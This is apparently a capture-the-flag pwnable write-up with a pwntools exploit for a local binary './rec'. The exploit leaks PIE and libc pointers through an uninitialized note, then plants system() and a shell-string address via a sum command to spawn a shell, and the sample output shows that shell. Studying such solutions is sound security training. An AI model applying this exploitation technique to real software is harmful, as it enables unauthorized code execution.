Category : pwnable
Summary : uninitialized variable — reading the note (menu item 1) before anything has been written to it returns leftover memory that holds a pointer into the PIE binary and a pointer into libc. The exploit uses those two values to defeat PIE/ASLR, then plants `system()` and a shell-string address through the polish-notation sum command and triggers them with menu item 5.
Exploit
#!/usr/bin/python
from pwn import *
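def cmd_polish_sum(nums):
    """Run menu item 2 with operator 'S' (sum) and feed ``nums`` as its operands.

    Each value is sent after the program's 'Operand: ' prompt as its decimal
    string; the list is terminated with '.', and the result line the program
    prints afterwards is consumed so the next ``ru('> ')`` starts clean.

    The top-level payload relies on the program accepting a negative operand
    (``libc_system - 0x100000000``) — presumably because operands are parsed
    as signed integers; confirm against the binary before reusing.

    Args:
        nums: iterable of ints (count and order matter: they are laid out in
              the buffer that menu item 5 later acts on — inferred from the
              exploit, not verified here).

    Returns:
        None. Purely I/O on the global process via the ``ru``/``sl``/``rl``
        aliases defined at module level.
    """
    ru('> ')
    sl('2')
    ru('Operator: ')
    sl('S')
    # Iterate the values directly instead of indexing via range(len(nums)).
    for num in nums:
        ru('Operand: ')
        sl(str(num))
    ru('Operand: ')
    sl('.')  # '.' terminates the operand list
    rl()     # discard the printed result line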
def cmd_sign(num):
    """Select menu item 5 and immediately send ``num`` as its argument.

    Unlike the other helpers this does not wait for a prompt between the two
    lines; the program presumably reads the argument without printing one
    (or buffers the second line) — the original script behaved the same way.
    """
    ru('> ')
    for line in ('5', str(num)):
        sl(line)
def cmd_read_note():
    """Select menu item 1 and return what the program prints after 'Your note: '.

    The line is returned without its trailing newline (``recvline(False)`` is
    ``keepends=False``). Issued before any note has been written, this is the
    information leak the exploit is built on: the caller parses the returned
    bytes for a PIE pointer and a libc pointer.

    Returns:
        The raw note bytes/str as delivered by pwntools.
    """
    ru('> ')
    sl('1')
    ru('Your note: ')
    return rl(False)
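# --- exploit body -----------------------------------------------------------
s = process('./rec')

# Short aliases used by the cmd_* helpers above.
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

# 1. Info leak: read the note before anything has been written to it; the
#    uninitialised buffer comes back holding leftover pointers.
leak = cmd_read_note()
# u32() needs exactly 4 bytes; fail with a clear message instead of an opaque
# struct error if the leak is shorter than the 12 bytes sliced below.
if len(leak) < 12:
    raise ValueError('note leak too short (%d bytes): %r' % (len(leak), leak))

# leak[4:8] is a pointer into the PIE binary, leak[8:12] a pointer into libc.
# The subtracted constants are offsets specific to the local ./rec build and
# the libc it was linked against; they must be recomputed for any other build.
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc          # presumably a shell-command string in the binary (per the name)
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940      # system() in the matching libc
print(hex(libc_base))                  # a page-aligned value (...000) is a quick sanity check

# 2. Payload: zero-fill the operand slots up to the target, then place
#    system() and its argument. Operands appear to occupy 8 bytes each
#    (inferred from the /8). Use // so the count stays an int under Python 3;
#    the result is identical under Python 2.
pad_count = (0x380 - 0x24 - 8 - 0x44 + 8) // 8
pay = [0] * pad_count
# libc_system is above 0x7fffffff on this 32-bit target (see libc_base in the
# sample run); sending it minus 2**32 keeps the decimal inside the signed
# 32-bit range while its low 32 bits still equal libc_system -- presumably the
# operand parser reads a signed int.
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)

# 3. Trigger: menu item 5 presumably uses the uninitialised data left behind
#    by the sum, calling system(sh_string).
cmd_sign(0)

s.interactive()
s.close()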
$ python ex.py
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)